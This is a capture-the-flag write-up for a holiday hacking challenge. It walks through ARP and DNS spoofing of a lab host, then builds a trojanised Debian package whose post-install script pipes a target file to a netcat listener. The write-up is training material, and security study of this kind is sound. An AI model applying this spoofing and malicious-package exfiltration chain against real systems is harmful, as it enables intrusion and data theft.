ARP Shenanigans: SHHC20
ARP Shenanigans

In the NetWars roof beside Alabaster Snowball is a terminal titled ARP Shenanigans.

Talking with Alabster, he states we need to do a man-in-the-middle attack on a host compromised by Jack Frost and read the contents of a file on the file system.


Doing a quick tcpdump with tcpdump -nne -vv shows the host repeatedly doing an arp call for

Who dat?

Looking in ~/scripts shows python scripts for spoofing ARP (~/scripts/ and spoofing a DNS query response (~/scripts/

First order of business is modifying these scripts with appropriate values so that they correctly spoof the ARP and DNS query.

After a bit of trial and error, the revised scripts posted here: and

Gimme the File

The help mentions using python to run a webserver, so I fired that up next using python3 -m http.server 80.

This showed the remote host repeatedly trying to download the file /pub/jfrost/backdoor/suriv_amd64.deb.

The directory ~/debs has multiple debian packages, including netcat. What if we modified this package to open a netcat connection after install and pipe the file back to a listening netcat on our side?

New Package

First I created a directory for the extracted package by running mkdir -p ~/debs/netcat.

I then extracted the netcat package to the new dir by running dpkg-deb -R ~/debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb ~/debs/netcat.

To the postinst script I added commands to cat the requested file to a netcat back to this server by running cat << EOF >> ~/debs/netcat/DEBIAN/postinst
cat /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt | nc `hostname -I` 4444

I then rebuilt the package into the file that the remote host is trying to download with dpkg-deb -b ~/debs/netcat ~/debs/suriv_amd64.deb.

To cover the path requested for the file, I created some subdirs and a sym link with mkdir -p ~/pub/jfrost
ln -s ~/debs ~/pub/jfrost/backdoor

I then started up the HTTP server with python3 -m http.server 80.

In a different tmux pane, I started up netcat listening on a port with redirecting any output to a file using nc -lvp 4444 > ~/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt

Start the Sequence

In another pane I then started the and scripts in an infinite loop.

The chain began. The arp request was spoofed, then the dns request. The remote host connected to the web server and downloaded the file. During the post install, the package made a connection back to this host and cat the file.

Who Recuse

Reading the file that was collected shows who recused themselves in the vote..

Tanta Kringle

An overview of all people, places, and events can be learned in the Introduction.